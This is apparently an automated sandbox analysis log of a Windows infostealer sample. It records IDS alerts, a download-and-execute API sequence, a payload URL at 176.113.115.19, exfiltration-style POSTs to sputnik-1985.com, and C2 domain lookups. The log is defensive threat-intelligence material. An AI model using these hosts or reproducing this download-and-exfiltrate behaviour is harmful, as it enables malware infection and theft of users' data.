Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49803 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49777 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49722 -> 104.21.56.70:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VBTBDB2JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12782Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R8711981CN6FTIDUSQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9CSXACU1NSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20383Host: sputnik-1985.com

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029EA

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: heckout.steampowered.com/ https://www.youtube.com https: equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: skidjazzyric.click
Source: global traffic	DNS traffic detected: DNS query: soundtappysk.shop
Source: global traffic	DNS traffic detected: DNS query: femalsabler.shop
Source: global traffic	DNS traffic detected: DNS query: apporholis.shop
Source: global traffic	DNS traffic detected: DNS query: crowdwarek.shop
Source: global traffic	DNS traffic detected: DNS query: versersleep.shop
Source: global traffic	DNS traffic detected: DNS query: chipdonkeruz.shop
Source: global traffic	DNS traffic detected: DNS query: handscreamny.shop
Source: global traffic	DNS traffic detected: DNS query: robinsharez.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: b0cQukXPAl.exe, b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.1351206300.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.1351206300.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: b0cQukXPAl.exe, 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.u
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fas
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/p4
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalConter
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/cssB
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l
